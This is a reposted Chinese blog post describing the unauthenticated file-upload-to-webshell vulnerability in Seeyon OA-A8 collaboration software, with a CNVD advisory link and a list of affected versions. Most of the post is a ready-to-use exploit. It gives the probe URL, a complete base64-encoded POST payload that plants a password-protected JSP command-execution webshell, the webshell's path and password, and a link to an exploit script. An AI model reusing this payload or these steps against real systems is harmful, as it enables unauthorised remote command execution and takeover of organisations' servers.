當前位置：首頁 > 编程资源 > 综合教程 >内容正文

综合教程

致远OA-A8协同管理软件无需登录getshell漏洞

發布時間：2023/12/15 综合教程 19 生活家

生活随笔收集整理的這篇文章主要介紹了致远OA-A8协同管理软件无需登录getshell漏洞小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

CNVD《關于致遠OA-A8系統存在遠程命令執行漏洞的安全公告》：https://www.cnvd.org.cn/webinfo/show/5095

該系統的漏洞點在于致遠OA-A8系統的Servlet接口暴露，安全過濾處理措施不足，使得用戶在無需認證的情況下實現任意文件上傳。

攻擊者利用該漏洞，可在未授權的情況下，遠程發送精心構造的網站后門文件，從而獲取目標服務器權限，在目標服務器上執行任意代碼漏洞。

影響范圍：

致遠A8-V5協同管理軟件 V6.1sp1

致遠A8+協同管理軟件 V7.0、V7.0sp1、V7.0sp2、V7.0sp3

致遠A8+協同管理軟件 V7.1

上面是CNVD發布的漏洞影響范圍，但我在V6.1_SP2版本依然測試成功，不知道為什么。

測試環境：致遠A8-V5協同管理軟件 V6.1_SP2_2018-03-27_2653852748

第1步：訪問/seeyon/htmlofficeservlet
如果出現下圖所示的內容，表示存在漏洞。

第2步：構造PoC
把下面的PoC經base64解碼就是POST數據包內容：

REJTVEVQIFYzLjAgICAgIDM1NSAgICAgICAgICAgICAwICAgICAgICAgICAgICAgNjY2ICAgICAgICAgICAgIERCU1RFUD1PS01MbEtsVg0KT1BUSU9OPVMzV1lPU1dMQlNHcg0KY3VycmVudFVzZXJJZD16VUNUd2lnc3ppQ0FQTGVzdzRnc3c0b0V3VjY2DQpDUkVBVEVEQVRFPXdVZ2hQQjNzekIzWHdnNjYNClJFQ09SRElEPXFMU0d3NFNYekxlR3c0VjN3VXczelVvWHdpZDYNCm9yaWdpbmFsRmlsZUlkPXdWNjYNCm9yaWdpbmFsQ3JlYXRlRGF0ZT13VWdoUEIzc3pCM1h3ZzY2DQpGSUxFTkFNRT1xZlRkcWZUZHFmVGRWYXhKZUFKUUJSbDNkRXhReVlPZE5BbGZlYXhzZEdoaXlZbFRjQVRkTjFsaU40S1h3aVZHemZUMmRFZzYNCm5lZWRSZWFkRmlsZT15UldaZEFTNg0Kb3JpZ2luYWxDcmVhdGVEYXRlPXdMU0dQNG9FekxLQXo0PWl6PTY2DQo8JUAgcGFnZSBsYW5ndWFnZT0iamF2YSIgaW1wb3J0PSJqYXZhLnV0aWwuKixqYXZhLmlvLioiIHBhZ2VFbmNvZGluZz0iVVRGLTgiJT48JSFwdWJsaWMgc3RhdGljIFN0cmluZyBleGN1dGVDbWQoU3RyaW5nIGMpIHtTdHJpbmdCdWlsZGVyIGxpbmUgPSBuZXcgU3RyaW5nQnVpbGRlcigpO3RyeSB7UHJvY2VzcyBwcm8gPSBSdW50aW1lLmdldFJ1bnRpbWUoKS5leGVjKGMpO0J1ZmZlcmVkUmVhZGVyIGJ1ZiA9IG5ldyBCdWZmZXJlZFJlYWRlcihuZXcgSW5wdXRTdHJlYW1SZWFkZXIocHJvLmdldElucHV0U3RyZWFtKCkpKTtTdHJpbmcgdGVtcCA9IG51bGw7d2hpbGUgKCh0ZW1wID0gYnVmLnJlYWRMaW5lKCkpICE9IG51bGwpIHtsaW5lLmFwcGVuZCh0ZW1wKyJcbiIpO31idWYuY2xvc2UoKTt9IGNhdGNoIChFeGNlcHRpb24gZSkge2xpbmUuYXBwZW5kKGUuZ2V0TWVzc2FnZSgpKTt9cmV0dXJuIGxpbmUudG9TdHJpbmcoKTt9ICU+PCVpZigiYXNhc2QzMzQ0NSIuZXF1YWxzKHJlcXVlc3QuZ2V0UGFyYW1ldGVyKCJwd2QiKSkmJiEiIi5lcXVhbHMocmVxdWVzdC5nZXRQYXJhbWV0ZXIoImNtZCIpKSl7b3V0LnByaW50bG4oIjxwcmU+IitleGN1dGVDbWQocmVxdWVzdC5nZXRQYXJhbWV0ZXIoImNtZCIpKSArICI8L3ByZT4iKTt9ZWxzZXtvdXQucHJpbnRsbigiOi0pIik7fSU+NmU0ZjA0NWQ0Yjg1MDZiZjQ5MmFkYTdlMzM5MGQ3Y2U=

第3步：訪問webshell
webshell地址為/seeyon/test123456.jsp，密碼為：asasd3344。

感謝大佬提供的Python腳本，參考鏈接：https://github.com/nian-hua/CVEScript/blob/master/%E8%87%B4%E8%BF%9COA/zhiyuan.py

總結

以上是生活随笔為你收集整理的致远OA-A8协同管理软件无需登录getshell漏洞的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。

上一篇： Powershell 查看软件是否成功安
下一篇： Win10系统Maven环境变量怎么配置